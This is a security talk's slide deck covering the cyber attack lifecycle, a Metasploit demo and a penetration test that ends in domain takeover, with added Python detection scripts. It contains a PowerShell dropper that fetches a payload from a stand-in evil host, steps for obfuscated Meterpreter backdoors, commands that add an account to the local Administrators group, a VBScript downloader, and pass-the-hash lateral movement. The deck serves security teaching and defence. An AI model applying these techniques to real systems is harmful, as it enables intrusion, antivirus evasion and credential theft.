Agenda
• Objectives
• Introduction
• Cyber Attack Lifecycle
• Vulnerabilities and Exploitation
• Example of a penetration test scenario
• Conclusion
Objectives
Get insight into the methodologies used during a cyber attack
Understand how hackers penetrate a network, elevate their privileges, maintain persistence and hide their malicious activities
Show hands-on:
Provide a concrete example using Metasploit tool
Show a Demo in real time
Deep dive into a real life pentesting exercise
Understand what can be done to protect against cyber attacks
Introduction
Frédéric De Pauw
Co-Founder / Offensive Security @Avanguard
Ethical Hacker
Head IT Security @Ethias
Freelance Ethical Hacker (BE – LUX – US)
https://be.linkedin.com/in/fdepauw
Introduction
What is Cyber Crime?
Computer crime, or cybercrime, is crime that involves a computer and a network
Two types of Cyber Crime:
Technology is the target: enterprise, state and personal systems
Technology is the instrument: criminal activities carried out on the Internet
This session is focused on the first type
Introduction
Technology = Target:
Distributed Denial of Service
Hacking
Malware, Ransomware
Phishing
Hacktivism
…
Technology = Instrument:
Child pornography
Incitement to racial hatred
Incitement to terrorism
Money laundering
Drug selling
Spam
…
Introduction
Cyber Crime
Has evolved drastically over the past years, following the global evolution of ICT supporting human activity
Allows cyber criminals to make profits comparable to other types of crime
Offers some advantages over other criminal activities: anonymity, discretion, no borders
Remains little prosecuted, with no international legislation
Has evolved into cyber war with state-sponsored attacks
Will affect our lives (connected cars, Operational Technologies, IoT)
Cost of cyber crime in Belgium: 3,5 billion Euros
Introduction
• Evolution of Cyber Crime (increasing sophistication over time)
1985-1995: entertainment, first worms, phone hacking
Hacktivism: virus spread, website defacement
Organized crime: DDoS, company systems hacking, data leak, industrial espionage
2010-2016-…: cyber war, targeted attacks, state-sponsored attacks
Introduction
Future of Cyber Crime
Intensification of targeted cyber attacks against enterprises with significant impacts (financial, reputational, …)
Predominance of Advanced Persistent Threats targeting the end user
Intensification of cyber war / cyber espionage activities between nations
Increase of cyber crime targeting connected objects and operational technologies
Hacking of a plane - 2015
Hacking of a pacemaker - 2013
Car hacking - 2015
Introduction
Legal evolution
General Data Protection Regulation (GDPR) – adopted at the end of 2016, comes into force on 25 May 2018
Circulars of National Bank of Belgium
Regulation for financial sector
Data Breach notification standard
Within 72 hours
Fines in case of data leak
Max 4% of turnover, maximum 20 M€
Cyber Attack Lifecycle
1 Reconnaissance: public information, social networks, vulnerability scanning, physical observation
2 Initial Infection: vulnerabilities, virus / malware, social engineering, physical intrusion
3 Gain Control: control the infected system
4 Privilege Escalation: gain elevated privileges on the infected system
5 Lateral Movement: compromise more systems deeper in the network
6 Persistence: maintain a persistent connection with infected systems
7 Malicious Activities: data exfiltration, hacking websites, money extortion, …
Cyber Attack Lifecycle > Reconnaissance
The reconnaissance process is a key activity
During this phase crucial information is obtained in order to perform the cyber attack
For instance, the information is used to determine the best attack vector
Activities performed are:
Collect information concerning the target (websites, telephone numbers, general mailboxes, …) from public sources
Collect information through direct contact such as phone calls (fake poll, job seeker, …)
Collect technical information concerning the target's information system (exposed systems, partners, data centers, …)
Collect information on premises (garbage, WiFi scanning, …)
Actively scan enterprise networks exposed on the Internet
Cyber Attack Lifecycle > Reconnaissance
Commercial tool: Maltego
Free tools (Kali Linux): recon-ng, DMitry, theHarvester
Cyber Attack Lifecycle > Reconnaissance
After reconnaissance, attackers should have obtained enough information to determine the best attack vectors for the initial infection phase
For instance:
Vulnerabilities affecting systems exposed on the Internet
Lack of physical access controls at facilities
Social engineering attack on selected profiles, for instance chosen from social network information
Cyber Attack Lifecycle > Initial Infection
Initial Infection is aimed at obtaining a first backdoor within the target information system
Vectors:
Exploiting a vulnerability affecting the victim’s system(s)
Infection through Virus / Malware
Exploiting a physical vulnerability
Installing rogue access points or devices
Cyber Attack Lifecycle > Initial Infection
Diagram: attack surface for initial infection across four zones (Perimeter, Public Cloud, Private Cloud, Corporate Network), each holding applications (on-prem, SaaS or corporate), servers / appliances and security technology, with end users in the corporate network.
Cyber Attack Lifecycle > Initial Infection
Lan Turtle from Hakshop
https://youtu.be/l8YpTOv7Q2A
Cyber Attack Lifecycle > Initial Infection
IDS/IPS bypass: encryption
Anti-virus bypass: use a simple PowerShell command as a dropper which fetches an encrypted payload over the Internet
powershell.exe "IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt'))"
Unknown viruses: use staging to decouple the payload from the initial dropper; the dropper is injected directly into memory
Firewall bypass: use « reverse » connections which connect back to the C&C, e.g. HTTPS passing through the enterprise proxy
Cyber Attack Lifecycle > Initial Infection
Free tool for malware code obfuscation: VEIL Evasion Framework
Generates obfuscated payloads using several methods
Metasploit Meterpreter payloads
Generate payloads from different sources
C/C++ shellcode
Powershell shellcode
Python shellcode
Cyber Attack Lifecycle > Initial Infection
Metasploit + VEIL framework
Create a Meterpreter backdoor obfuscated with VEIL (PowerShell type)
Cyber Attack Lifecycle > Initial Infection
Metasploit + VEIL Framework
Create a Meterpreter backdoor using VEIL for antivirus evasion
Embed the virus in a Word macro, or create a .bat file; include the payload directly or fetch it from a web server
Cyber Attack Lifecycle > Gain Control
Once initial infection is performed, the objective is to gain control over the machine.
For this, a network connection must be established between the victim and the Command & Control server
In general a « reverse » connection is made to bypass inbound firewall protection
Several techniques exist to bypass outbound filtering (if present)
Cyber Attack Lifecycle > Gain Control
Standard enterprise security principles for outbound filtering:
Default policy is to deny all outbound connections
Allowed outbound connections must go through a proxy
Outbound connections must conform to the expected protocol
Outbound connections must pass other checks as well
Examples of outbound filtering evasion techniques:
Reverse HTTP and / or HTTPS traffic (with or without verification of proxy settings)
Payload staging over DNS by placing the payload in the TXT records of a domain
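The two evasion techniques above leave traces in logs a defender already has: a reverse connection that re-polls its C&C through the proxy shows up as contacts at a near-constant interval, and a payload pulled down in TXT records shows up as a burst of large TXT answers from one domain. The following Python is an added example written for this page, not a tool from the slides or from Metasploit; the proxy and resolver log formats, host names and addresses are constructed for the demonstration, and the thresholds (5 hits, 20 % jitter, 10 TXT queries of 200+ bytes) are starting points to tune, not standards.

```python
"""Added example (not from the slides): spotting the two outbound-evasion
channels named above, beaconing over reverse HTTP(S) through the proxy and
payload staging over DNS TXT records, in proxy and resolver logs.
The log formats and every host name / address are constructed for this
example; they are not the output of any particular product."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log: "<timestamp> <client_ip> <method> <host> <bytes>".
# The first five lines are a backdoor calling home every 60 s; the rest is a
# user browsing at irregular intervals.
PROXY_LOG = """\
2017-03-01T09:00:00 10.1.2.3 CONNECT c2.example.net 512
2017-03-01T09:01:00 10.1.2.3 CONNECT c2.example.net 498
2017-03-01T09:02:00 10.1.2.3 CONNECT c2.example.net 505
2017-03-01T09:03:00 10.1.2.3 CONNECT c2.example.net 501
2017-03-01T09:04:00 10.1.2.3 CONNECT c2.example.net 510
2017-03-01T09:00:12 10.1.2.3 GET www.example.com 14021
2017-03-01T09:07:40 10.1.2.3 GET www.example.com 3207
2017-03-01T09:31:05 10.1.2.3 GET www.example.com 8800
""".splitlines()

# Constructed resolver log: "<timestamp> <client_ip> <qtype> <qname> <answer_bytes>".
# Twelve consecutive TXT lookups of chunkN.stage.<domain>, each returning a
# near-maximal answer, is what a payload pulled down in TXT records looks like.
DNS_LOG = [f"2017-03-01T09:05:{i:02d} 10.1.2.3 TXT chunk{i}.stage.evil-example.org 255"
           for i in range(12)] + [
    "2017-03-01T09:06:30 10.1.2.3 TXT _dmarc.example.com 80",   # legitimate TXT use
    "2017-03-01T09:06:31 10.1.2.3 A www.example.com 48",
]


def parse_proxy(lines):
    """Turn proxy log lines into dicts with a real datetime for interval maths."""
    records = []
    for line in lines:
        ts, client, method, host, size = line.split()
        records.append({"ts": datetime.fromisoformat(ts), "client": client,
                        "method": method, "host": host, "bytes": int(size)})
    return records


def find_beacons(records, min_hits=5, max_jitter=0.2):
    """Flag (client, host) pairs contacted at near-constant intervals.

    A reverse connection that re-polls its C&C on a timer produces gaps whose
    standard deviation is tiny relative to their mean; human browsing does not.
    """
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["client"], r["host"])].append(r["ts"])
    hits = []
    for (client, host), stamps in by_pair.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        if period > 0 and pstdev(gaps) / period <= max_jitter:
            hits.append({"client": client, "host": host,
                         "hits": len(stamps), "period_s": period})
    return hits


def parse_dns(lines):
    """Turn resolver log lines into dicts."""
    records = []
    for line in lines:
        ts, client, qtype, qname, size = line.split()
        records.append({"ts": ts, "client": client, "qtype": qtype,
                        "qname": qname, "answer_bytes": int(size)})
    return records


def registered_domain(qname):
    """Collapse chunk1.stage.evil-example.org to evil-example.org (last two
    labels; a real deployment would use the public suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def find_txt_staging(records, min_queries=10, min_avg_bytes=200):
    """Flag clients pulling many large TXT answers from one domain: the
    'payload in TXT records' staging technique from the slide."""
    by_domain = defaultdict(list)
    for r in records:
        if r["qtype"] == "TXT":
            by_domain[(r["client"], registered_domain(r["qname"]))].append(r)
    hits = []
    for (client, domain), rs in by_domain.items():
        avg = mean(r["answer_bytes"] for r in rs)
        if len(rs) >= min_queries and avg >= min_avg_bytes:
            hits.append({"client": client, "domain": domain, "queries": len(rs),
                         "distinct_names": len({r["qname"] for r in rs}),
                         "avg_answer_bytes": round(avg)})
    return hits


if __name__ == "__main__":
    for alert in find_beacons(parse_proxy(PROXY_LOG)) + find_txt_staging(parse_dns(DNS_LOG)):
        print(alert)
```

Both checks assume the proxy is the only permitted path out and that the resolver logs answer sizes, which is exactly the "deny by default, everything through the proxy" posture the slide describes; without that posture the beacon never touches the proxy log and the check has nothing to look at.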
Cyber Attack Lifecycle > Gain Control
Metasploit / Meterpreter
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Cyber Attack Lifecycle > Privilege Escalation
Escalate privileges on infected machines in order to gain elevated access
A typical example is obtaining Administrator or SYSTEM privileges
Several techniques:
« Local exploits » against local applications on the infected machine
Manual search for credentials in scripts
Password hash dump (e.g. SAM, /etc/passwd) and cracking
Authenticated session grabbing (e.g. VPN sessions)
SSH keys
World-writable files
Reading command history files
Batch / job alteration
Process injection
Try injecting malicious code into processes running under a « Domain Admin » privileged user
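Several of the footholds in that list (credentials in scripts, world-writable files, readable history files and SSH keys) are configuration mistakes an administrator can find before an attacker does. The Python below is an added example for this page, not a tool from the slides: it audits a directory tree for those three conditions and builds a constructed sample tree in a temporary directory (POSIX permissions assumed; file names, the password and the key text are made up) so the audit can be run and checked offline.

```python
"""Added example (not from the slides): a local audit for three of the
privilege-escalation footholds listed above, world-writable files, credentials
left in scripts, and private files (shell history, SSH keys) readable by
others. build_sample_tree() creates a constructed tree in a temporary
directory so the audit can be exercised offline; the file names, the password
and the key text in that tree are all made up, and POSIX modes are assumed."""
import re
import stat
import tempfile
from pathlib import Path

# "password=...", "secret: ..." and similar assignments inside scripts/configs.
CRED_PATTERN = re.compile(r"(?i)(password|passwd|pwd|secret|api[_-]?key)\s*[=:]\s*\S+")
SCRIPT_SUFFIXES = (".sh", ".bat", ".cmd", ".ps1", ".py", ".vbs", ".conf", ".cfg", ".ini")
# Files that must only be readable by their owner.
PRIVATE_NAMES = {".bash_history", ".zsh_history", "id_rsa", "id_ed25519", ".netrc"}


def _walk(root):
    """Yield (path, path relative to root, st_mode) for every non-symlink entry."""
    root = Path(root)
    for path in root.rglob("*"):
        if not path.is_symlink():
            yield path, str(path.relative_to(root)), path.stat().st_mode


def find_world_writable(root):
    """Anything writable by 'other': a script run by root or by a scheduled job
    that an unprivileged user can edit is a direct path to elevated code."""
    return sorted(rel for _, rel, mode in _walk(root) if mode & stat.S_IWOTH)


def find_credential_strings(root):
    """(relative path, line number) for credential-looking assignments in scripts."""
    hits = []
    for path, rel, _ in _walk(root):
        if path.is_file() and path.suffix.lower() in SCRIPT_SUFFIXES:
            for n, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
                if CRED_PATTERN.search(line):
                    hits.append((rel, n))
    return sorted(hits)


def find_readable_private_files(root):
    """History files and private keys that group or world can read."""
    return sorted(rel for path, rel, mode in _walk(root)
                  if path.is_file() and path.name in PRIVATE_NAMES
                  and mode & (stat.S_IRGRP | stat.S_IROTH))


def build_sample_tree():
    """Constructed sample tree: one bad backup script, one over-permissive key."""
    root = Path(tempfile.mkdtemp(prefix="privesc-audit-"))
    for d in ("opt", "opt/backup", "home", "home/alice", "home/alice/.ssh"):
        (root / d).mkdir()
        (root / d).chmod(0o755)          # explicit, so the result is umask-independent
    script = root / "opt/backup/nightly.sh"
    script.write_text('#!/bin/sh\nDB_PASSWORD=Summer2017!\n'
                      'mysqldump -u backup -p"$DB_PASSWORD" app > /tmp/app.sql\n')
    script.chmod(0o777)                  # world-writable job script (bad)
    log = root / "opt/backup/run.log"
    log.write_text("ok\n")
    log.chmod(0o644)                     # world-readable but not writable (fine)
    key = root / "home/alice/.ssh/id_rsa"
    key.write_text("-----BEGIN RSA PRIVATE KEY-----\n(constructed placeholder, not a key)\n")
    key.chmod(0o644)                     # private key readable by everyone (bad)
    hist = root / "home/alice/.bash_history"
    hist.write_text("ssh admin@db01\n")
    hist.chmod(0o600)                    # correctly locked down
    return str(root)


if __name__ == "__main__":
    sample = build_sample_tree()
    print("world-writable:", find_world_writable(sample))
    print("credentials in scripts:", find_credential_strings(sample))
    print("readable private files:", find_readable_private_files(sample))
```

Pointing the three functions at a real root (`/opt`, `/home`, `/etc/cron.d`) turns this into the "identify your vulnerabilities before the hackers" step from the conclusion; the credential regex is deliberately loose and will need a review pass, since a false positive costs a minute while a missed hard-coded password costs a domain.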
Cyber Attack Lifecycle > Privilege Escalation
Metasploit: « Incognito » module
Allows impersonating authentication tokens on compromised Windows hosts
The backdoor must run with « SYSTEM » or « Administrator » privileges in order to see interesting authentication tokens
TIP: File servers are virtual treasure troves of tokens since most file servers are used as network attached drives via domain logon scripts
Cyber Attack Lifecycle > Lateral Movement
From infected systems, try to infect more systems deeper in the network
Basically repeat the Cyber Attack Lifecycle process (recon, initial infection, privilege escalation…)
Aim for high-value systems: Windows domain controllers, file servers, …
Techniques
Credential re-use / pass-the-hash / SSH key re-use
Internal application vulnerabilities (less often patched)
Network segmentation issues between environments (e.g. port 445) – PsExec with Pass-The-Hash
Cyber Attack Lifecycle > Lateral Movement
Metasploit – Pivoting technique
Basically using the first compromise to allow, and even aid in, the compromise of other, otherwise inaccessible systems
1. Use Autoroute to make the compromised host a pivot to other networks
2. Scan the network through the route created on ports 139 & 445
3. Start a new session on a new host using PsExec and the "Pass-The-Hash" technique, re-using the local Administrator password hash
Cyber Attack Lifecycle > Maintain Persistence
Prevent loss of connection between infected machines and the C&C
Techniques
Create jobs / scheduled tasks
Create a service that runs on startup
Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)
Bootkit / Rootkit
Default file association
Logon Scripts
Modification of Applications / Services
Registry RUN keys
Cyber Attack Lifecycle > Maintain Persistence
Metasploit / Persistence module
Create a Meterpreter service which will start when the compromised host boots
Cyber Attack Lifecycle > Demo
Social Engineering scenario
Send a « Virus » to the victim which consists of a Metasploit Meterpreter instance
Undetected by up-to-date commercial antivirus
1. Prepare Malware & environment
2. Send Malware
3. Execute Malware
4. Get infected & Contact C&C
5. Interact
Vulnerabilities and Exploitation
A vulnerability is a flaw in a system which allows a malicious user to compromise its confidentiality, integrity and / or availability
Simple example: a default password. Complex example: a buffer overflow in an application
Dozens of new vulnerabilities are officially classified every day
http://www.cvedetails.com
Dozens of others are not disclosed!
0DAY – vulnerabilities not yet discovered, or not disclosed
Vulnerabilities are discovered by:
Researchers, students (ethical hackers)
Professional researchers (vulnerability brokers)
http://www.zerodayinitiative.com/
France – Vupen Security – sells vulnerabilities to NASA
Cyber criminals (0DAYS)
Vulnerabilities and Exploitation
Full disclosure principle
Vulnerabilities are reported and published publicly as soon as they are discovered, regardless of whether a patch is available
Responsible disclosure principle
Vendors are notified first
The vulnerability is publicly disclosed after 45 days
Websites with vulnerabilities and associated exploits
www.securityfocus.com
www.1337day.com (not free)
http://www.cvedetails.com/
http://www.exploit-db.com/
Underground Websites on TOR network
Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR), ccc.de (DE), blackhat.com (US)
Vulnerabilities and Exploitation
Complexity of systems, application code, communication flows and network segmentation
Out-of-the-box vulnerabilities of vendor solutions, lack of security configuration
Next->Next->Next syndrome
Lack of secure coding awareness
OWASP Top 10
Lack of enforcement of security during IT projects
Security implies cost and time
Need for functionality <-> need for security
Blacklist mode
Learning mode
Penetration test example
• Context: Black Box Intrusion test. Scope: External-facing systems
Diagram: Internet-facing web servers (ports 80 HTTP and 443 HTTPS) in the DMZ; the enterprise Windows domain sits on the internal network (intranet).
Penetration test example
• VULN 1/2: Vulnerable deployment of SAP BO (Apache Axis2)
• CVE-2010-0219, Apache Axis2 default credentials
• http://www.securityfocus.com/bid/40343, Apache Axis2 directory traversal
• See earlier: vuln « Directory Traversal », vuln « Default Password »
• Gives admin credentials to Axis2
Penetration test example
• Access to the Axis2 administration allows uploading a web service and hot-deploying it
Penetration test example
• A Metasploit module exists to exploit this vuln: Axis2 / SAP BusinessObjects Authenticated Code Execution
• http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer
• We use it to deploy a reverse-shell backdoor on the server which connects back to port 80
• VULN 3: The server is allowed to contact any host on the Internet on ports 80 and 443
Diagram: the DMZ web server (ports 80 HTTP and 443 HTTPS) opens an outbound port 80 connection to the C&C server on the Internet; the enterprise Windows domain sits on the internal network.
Penetration test example
• Not possible to upload a Meterpreter (killed by the AV on the machine)
• Possible to upload a backdoor which sends me back a DOS command prompt on the server
Penetration test example
• Next steps:
• Create a privileged account on the server
• VULN 4: The application server is running under ADMIN privileges
• Net user temptest password /add
• Net localgroup Administrators hacked /add
• Obtain a Remote Desktop connection
• Problem: Port 3389 is closed inbound
• Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389
Diagram: the web server reaches the C&C server on port 80 and the SSH server on port 443; the reverse SSH tunnel over port 443 exposes the web server's port 3389.
Penetration test example
• To create the tunnel, I need to download an SSH client onto the server using the DOS command prompt
• I create a VBScript using the « Echo » command, then execute the VBScript
• Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs
• Cscript dl.vbs
• Use plink to create the tunnel
' dl.vbs as shown on the slide, one statement per line
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.putty.com/plink.exe", False
xHttp.Send
with bStrm
    .type = 1 '//binary
    .open
    .write xHttp.responseBody
    .savetofile "c:\temp\plink.exe", 2 '//overwrite
end with
Penetration test example
Diagram: the web server reaches the C&C server on port 80 and the SSH server on port 443; the reverse SSH tunnel over port 443 carries port 3389.
Connect to RDP through the tunnel using the user account I just created
Account: temptest / password
Penetration test example
Next step -> Lateral Movement – the simplest first: credential reuse
I need to crack all passwords present locally on the infected server
Vuln 6/7: Windows 2003 design vulnerabilities
VULN 6: the « Repair » file contains a SAM backup file containing credentials encrypted using LMHASH
VULN 7: the LMHASH encryption algorithm is broken and can be cracked easily
Penetration test example
VULN 8: Local Administrator password is replicated over all systems in the DMZ
Diagram: the reverse SSH tunnel over port 443 now gives access to port 3389 on every web server in the DMZ, since they share the local Administrator password.
Penetration test example
Next step: try to hit the internal network
VULN 9: DMZ systems are members of the internal Windows domain. This means that critical ports (e.g. 139, 445, …) must be open between the DMZ and the internal network
VULN 10: Password replication bis – a Domain Admin user account whose name is identical to a local account has the same password
Penetration test example
I connect to the Domain Controller from the DMZ using the Domain Admin account. I am now Domain Administrator and have full control over the enterprise domain
Diagram: from the DMZ web servers (ports 80 HTTP and 443 HTTPS) to the Domain Controller of the enterprise Windows domain on the internal network.
Conclusion
Cyber crime will continue to be a major threat to enterprises in the coming years
Computer vulnerabilities will continue to be discovered and will continue to affect enterprises
Legacy technologies such as standard AV are no longer sufficient to protect against cyber threats
Operational IT security programs must address security incident response and each of the following:
Awareness
Preventive security
Detective security
Corrective security
Conclusion
[Personal Statement] Be careful with the notion of risk-based security based on asset classification
Should less critical systems be given less attention in terms of security?
What if a hacker can compromise a system in a non-critical zone and obtain credentials that are re-used in other zones? What if the enterprise does not have one Windows domain per risk domain?
Use risk-based security only if you have full IT isolation… and even then, is that enough?
Awareness
Educate all your employees about emerging cyber threats
Run real social-engineering exercises, sending undetected viruses to your employees
Be careful with human reactions
Educate, but also protect colleagues who get infected during the exercise
Conclusion
Preventive Security
Sandboxing technologies must be implemented alongside standard signature-based AV to protect against APTs
Implement NAC
Identify your vulnerabilities before the hackers do
Network security must be governed: network segmentation policies, firewall rule governance, flow and application control, inbound and outbound traffic policies, …
Management of high privileges
Isolation of network tiers
Use hardening best practices
E.g. remove admin rights from end users and from applications (least privilege)
Implement correct Windows security settings
Conclusion
Detective security
Real-time correlation of technical use cases has real added value
Monitor for accounts creation on any system
Monitor any “Domain Admin” privilege elevation
Monitor for internal scans
Monitor authentication failures
Monitor denied outbound traffic
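The five monitoring use cases above, and the persistence mechanisms listed under "Maintain Persistence" (new services, scheduled tasks, registry Run keys, AppInit DLLs), each map to a small number of Windows or firewall events. The Python below is an added example written for this page, not a tool from the slides or from any SIEM product: it runs a rule set over a constructed stream of JSON-line events shaped like the trail the penetration test on this page would leave (host names, accounts and addresses are made up). The Windows event IDs are the standard ones (4720 account created, 4728/4732/4756 member added to a group, 4625 logon failure, 4698 scheduled task created, 7045 service installed, Sysmon 13 registry value set); the thresholds are assumptions to tune.

```python
"""Added example (not from the slides): a rule set that turns the monitoring
use cases listed under "Detective security", together with the persistence
mechanisms listed under "Maintain Persistence" (services, scheduled tasks,
registry Run keys, AppInit DLLs), into checks over a stream of events.
The events are constructed JSON lines; host names, accounts and addresses are
made up. The Windows event IDs are the standard ones: 4720 account created,
4728/4732/4756 member added to a group, 4625 logon failure, 4698 scheduled task
created, 7045 service installed, Sysmon 13 registry value set."""
import json
from collections import Counter, defaultdict

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
AUTORUN_KEYS = ("\\CurrentVersion\\Run", "AppInit_DLLs")   # covers Run, RunOnce, AppInit_DLLs

# Constructed events, roughly the trail the pentest scenario on this page
# would leave: an account created on a DMZ web server and added to the local
# Administrators group, autorun persistence, then logon attempts and a port
# sweep from that DMZ host against the internal network.
EVENTS = r"""
{"log":"Security","id":4720,"host":"WEB01","actor":"axis2svc","user":"temptest"}
{"log":"Security","id":4732,"host":"WEB01","group":"Administrators","member":"temptest"}
{"log":"Security","id":4728,"host":"DC01","group":"Domain Admins","member":"svc-backup"}
{"log":"Sysmon","id":13,"host":"WEB01","key":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\updater"}
{"log":"System","id":7045,"host":"WEB01","service":"WinUpdateSvc"}
{"log":"Security","id":4698,"host":"WEB01","task":"\\Maintenance\\Sync"}
{"log":"Security","id":4625,"host":"DC01","source_ip":"10.20.0.15"}
""".strip().splitlines()
EVENTS += [json.dumps({"log": "Security", "id": 4625, "host": "DC01", "source_ip": "10.20.0.15"})] * 5
EVENTS += [json.dumps({"log": "Firewall", "src_ip": "10.20.0.15", "dst_ip": "10.30.0.7",
                       "dport": p, "direction": "in", "action": "allow"})
           for p in (22, 80, 135, 139, 443, 445, 3389)]
EVENTS += [json.dumps({"log": "Firewall", "src_ip": "10.20.0.15", "dst_ip": "203.0.113.10",
                       "dport": 443, "direction": "out", "action": "deny"})] * 3


def load_events(lines):
    """Parse one JSON object per line."""
    return [json.loads(line) for line in lines]


def single_event_rule(ev):
    """Rules that fire on one event. Returns (rule, where, detail) or None."""
    log, eid = ev["log"], ev.get("id")
    if log == "Security" and eid == 4720:
        return ("account_created", ev["host"], f'{ev["actor"]} created {ev["user"]}')
    if log == "Security" and eid in (4728, 4732, 4756) and ev["group"] in PRIVILEGED_GROUPS:
        return ("privileged_group_change", ev["host"], f'{ev["member"]} added to {ev["group"]}')
    if log == "System" and eid == 7045:
        return ("service_installed", ev["host"], ev["service"])
    if log == "Security" and eid == 4698:
        return ("scheduled_task_created", ev["host"], ev["task"])
    if log == "Sysmon" and eid == 13 and any(k in ev["key"] for k in AUTORUN_KEYS):
        return ("autorun_registry_write", ev["host"], ev["key"])
    return None


def detect(events, failure_threshold=5, scan_port_threshold=5):
    """Single-event rules plus three counting rules (failed logons, port sweeps,
    denied outbound connections). Returns a list of (rule, where, detail)."""
    alerts = [a for a in map(single_event_rule, events) if a]
    failures = Counter(e["source_ip"] for e in events
                       if e["log"] == "Security" and e["id"] == 4625)
    alerts += [("auth_failure_burst", ip, f"{n} failed logons")
               for ip, n in failures.items() if n >= failure_threshold]
    ports_seen, denied_out = defaultdict(set), Counter()
    for e in events:
        if e["log"] != "Firewall":
            continue
        ports_seen[(e["src_ip"], e["dst_ip"])].add(e["dport"])
        if e["direction"] == "out" and e["action"] == "deny":
            denied_out[e["src_ip"]] += 1
    alerts += [("internal_scan", src, f"{len(p)} distinct ports on {dst}")
               for (src, dst), p in ports_seen.items() if len(p) >= scan_port_threshold]
    alerts += [("denied_outbound", ip, f"{n} blocked outbound connections")
               for ip, n in denied_out.items()]
    return alerts


if __name__ == "__main__":
    for rule, where, detail in detect(load_events(EVENTS)):
        print(f"{rule:24} {where:14} {detail}")
```

The point of running these as one rule set is the correlation the slide calls out: each alert on its own (a new local account, a blocked outbound connection) is routine noise on a busy estate, but the same DMZ host producing an account creation, an autorun write, a failed-logon burst against the domain controller and a port sweep within minutes is the lateral-movement step of the lifecycle, and that combination is what an analyst should be paged on.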
Corrective Security
Have emergency security procedures for containment defined and tested
Have a security incident response plan
Have a patching policy